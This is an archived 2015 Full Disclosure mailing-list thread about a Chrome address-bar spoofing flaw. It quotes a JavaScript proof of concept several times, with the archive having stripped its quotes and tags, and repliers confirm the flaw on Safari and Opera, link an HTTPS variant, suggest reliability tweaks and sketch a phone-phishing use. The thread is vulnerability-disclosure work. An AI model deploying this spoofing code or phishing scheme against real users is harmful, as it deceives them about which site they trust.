Re: [FD] Google Chrome Address Spoofing (Request For Comment)
Yes this is a pretty good find. I can also confirm it works on iOS 8.3 (12F69) with Safari. DW Sent from my iPad On Jul 2, 2015, at 9:33 AM, Mustafa Al-Bassam m...@musalbas.com wrote: That's pretty neat. Played around with this and made a few discoveries. 1. It shows a valid certificate when you spoof HTTPS sites. That's really bad. POC/screenshot: https://github.com/musalbas/address-spoofing-poc 2. The page isn't responsive when using this flaw. That means you can't spoof a login box for example. (I tried.) 3. The success of the exploit seems to depend on if the browser can start loading content.html fast enough. I noticed that the exploit works 100% of the time when used locally. Perhaps a better version of the exploit would somehow preload content.html - for example by opening a window with an URL that starts with javascript: followed by a script to display the content? That, or perhaps reducing the interval time for trying to run next() after the popup is created. I wonder if this works on any other browsers? MustafaOn 30 Jun 2015 7:08 am, David Leo david@deusen.co.uk wrote: Impact: The click to verify thing is completely broken... Anyone can be BBB Accredited Business etc. You can make whitehouse.gov display We love Islamic State :-) Note: No user interaction on the fake page. Code: * index.html script function next() { w.location.replace('http://www.oracle.com/index.html?'+n);n++; setTimeout(next();,15); setTimeout(next();,25); } function f() { w=window.open(content.html,_blank,width=500 height=500); i=setInterval(try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();},5); } /script a href=# onclick=f()Go/abr * content.html bThis web page is NOT oracle.com/b scriptlocation=http://www.oracle.com/index.html;;/script * It's online http://www.deusen.co.uk/items/gwhere.6128645971389012/ (The page says June/16/2015 - it works as we tested today) Request For Comment: We reported this to Google. They reproduced, and say It's DoS which doesn't matter. We think it's very strange, since the browser does not crash(not DoS), and the threat is obvious. What's your opinion? Kind Regards, PS We love clever tricks. We love this: http://dieyu.org/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
Found this POC: musalbas/address-spoofing-poc | | | | | | | | | | | musalbas/address-spoofing-pocaddress-spoofing-poc - Chrome address spoofing vulnerability proof-of-concept for HTTPS. (Original by David Leo.) | | | | View on github.com | Preview by Yahoo | | | | | On Thursday, July 2, 2015 9:21 AM, Valentinas Bakaitis v.bakai...@gmail.com wrote: Can you perform any actions on the page once the URL is replaced, or is it non responsive? (asking because PoC did not work on my Chrome 43.0.2357.130 (64-bit) on OSX). If it is non responsive then the impact is very limited. Worst thing I can think of is showing your account is suspended, please contact technical support on 0800-555-555 and then using the trust user puts in the URL for phone phishing. If it is responsive, then it's indeed pretty bad. Cheers! V. On Tue, Jun 30, 2015 at 6:08 PM, David Leo david@deusen.co.uk wrote: Impact: The click to verify thing is completely broken... Anyone can be BBB Accredited Business etc. You can make whitehouse.gov display We love Islamic State :-) Note: No user interaction on the fake page. Code: * index.html script function next() { w.location.replace('http://www.oracle.com/index.html?'+n);n++; setTimeout(next();,15); setTimeout(next();,25); } function f() { w=window.open(content.html,_blank,width=500 height=500); i=setInterval(try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();},5); } /script a href=# onclick=f()Go/abr * content.html bThis web page is NOT oracle.com/b scriptlocation=http://www.oracle.com/index.html;;/script * It's online http://www.deusen.co.uk/items/gwhere.6128645971389012/ (The page says June/16/2015 - it works as we tested today) Request For Comment: We reported this to Google. They reproduced, and say It's DoS which doesn't matter. We think it's very strange, since the browser does not crash(not DoS), and the threat is obvious. What's your opinion? Kind Regards, PS We love clever tricks. We love this: http://dieyu.org/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
That's pretty neat. Played around with this and made a few discoveries. 1. It shows a valid certificate when you spoof HTTPS sites. That's really bad. POC/screenshot: https://github.com/musalbas/address-spoofing-poc 2. The page isn't responsive when using this flaw. That means you can't spoof a login box for example. (I tried.) 3. The success of the exploit seems to depend on if the browser can start loading content.html fast enough. I noticed that the exploit works 100% of the time when used locally. Perhaps a better version of the exploit would somehow preload content.html - for example by opening a window with an URL that starts with javascript: followed by a script to display the content? That, or perhaps reducing the interval time for trying to run next() after the popup is created. I wonder if this works on any other browsers? MustafaOn 30 Jun 2015 7:08 am, David Leo david@deusen.co.uk wrote: Impact: The click to verify thing is completely broken... Anyone can be BBB Accredited Business etc. You can make whitehouse.gov display We love Islamic State :-) Note: No user interaction on the fake page. Code: * index.html script function next() { w.location.replace('http://www.oracle.com/index.html?'+n);n++; setTimeout(next();,15); setTimeout(next();,25); } function f() { w=window.open(content.html,_blank,width=500 height=500); i=setInterval(try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();},5); } /script a href=# onclick=f()Go/abr * content.html bThis web page is NOT oracle.com/b scriptlocation=http://www.oracle.com/index.html;;/script * It's online http://www.deusen.co.uk/items/gwhere.6128645971389012/ (The page says June/16/2015 - it works as we tested today) Request For Comment: We reported this to Google. They reproduced, and say It's DoS which doesn't matter. We think it's very strange, since the browser does not crash(not DoS), and the threat is obvious. What's your opinion? Kind Regards, PS We love clever tricks. We love this: http://dieyu.org/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
We reported this to Google. They reproduced, and say It's DoS which doesn't matter. We think it's very strange, since the browser does not crash(not DoS), I think they called it DOS because the chrome.exe process starts to consume system memory out of control. In my example (Win7 Chrome 43.0.2357.130) it ended up consuming 4GB+ of memory before it finally gave up 3 minutes or so later and issued an error message in both windows. Potentially, with multiple such frames being launched one could make it crash. That's beside the point though as the URL spoofing is clearly there. --Mike ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
Can you perform any actions on the page once the URL is replaced, or is it non responsive? (asking because PoC did not work on my Chrome 43.0.2357.130 (64-bit) on OSX). If it is non responsive then the impact is very limited. Worst thing I can think of is showing your account is suspended, please contact technical support on 0800-555-555 and then using the trust user puts in the URL for phone phishing. If it is responsive, then it's indeed pretty bad. Cheers! V. On Tue, Jun 30, 2015 at 6:08 PM, David Leo david@deusen.co.uk wrote: Impact: The click to verify thing is completely broken... Anyone can be BBB Accredited Business etc. You can make whitehouse.gov display We love Islamic State :-) Note: No user interaction on the fake page. Code: * index.html script function next() { w.location.replace('http://www.oracle.com/index.html?'+n);n++; setTimeout(next();,15); setTimeout(next();,25); } function f() { w=window.open(content.html,_blank,width=500 height=500); i=setInterval(try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();},5); } /script a href=# onclick=f()Go/abr * content.html bThis web page is NOT oracle.com/b scriptlocation=http://www.oracle.com/index.html;;/script * It's online http://www.deusen.co.uk/items/gwhere.6128645971389012/ (The page says June/16/2015 - it works as we tested today) Request For Comment: We reported this to Google. They reproduced, and say It's DoS which doesn't matter. We think it's very strange, since the browser does not crash(not DoS), and the threat is obvious. What's your opinion? Kind Regards, PS We love clever tricks. We love this: http://dieyu.org/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Google Chrome Address Spoofing (Request For Comment)
Impact: The click to verify thing is completely broken... Anyone can be BBB Accredited Business etc. You can make whitehouse.gov display We love Islamic State :-) Note: No user interaction on the fake page. Code: * index.html script function next() { w.location.replace('http://www.oracle.com/index.html?'+n);n++; setTimeout(next();,15); setTimeout(next();,25); } function f() { w=window.open(content.html,_blank,width=500 height=500); i=setInterval(try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();},5); } /script a href=# onclick=f()Go/abr * content.html bThis web page is NOT oracle.com/b scriptlocation=http://www.oracle.com/index.html;;/script * It's online http://www.deusen.co.uk/items/gwhere.6128645971389012/ (The page says June/16/2015 - it works as we tested today) Request For Comment: We reported this to Google. They reproduced, and say It's DoS which doesn't matter. We think it's very strange, since the browser does not crash(not DoS), and the threat is obvious. What's your opinion? Kind Regards, PS We love clever tricks. We love this: http://dieyu.org/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
2015-06-30 3:08 GMT-03:00 David Leo david@deusen.co.uk: Impact: The click to verify thing is completely broken... Anyone can be BBB Accredited Business etc. You can make whitehouse.gov display We love Islamic State :-) Did not work for me. I have been redirected to Oracle's actual website and then to a blank page later. Strangely though, it worked on the desktop version of Opera. -- Roney ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/